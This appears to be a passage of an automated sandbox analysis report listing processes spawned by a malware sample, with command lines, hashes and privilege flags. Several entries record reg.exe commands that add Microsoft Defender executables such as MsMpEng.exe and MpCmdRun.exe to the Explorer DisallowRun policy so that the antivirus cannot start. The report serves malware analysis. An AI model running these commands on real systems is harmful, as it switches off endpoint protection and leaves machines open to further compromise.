                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:29
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:29
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:29
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:30
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:30
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender4 /t REG_SZ /d 'SenseNdr.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:30
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:31
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:31
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                              Imagebase:0x7ff7b7180000
                                                                                                              File size:163336 bytes
                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:32
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:33
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender6 /t REG_SZ /d 'SenseCE.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:34
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:34
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:36
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender8 /t REG_SZ /d 'MpCmdRun.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:36
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Disassembly

                                                                                                              Code Analysis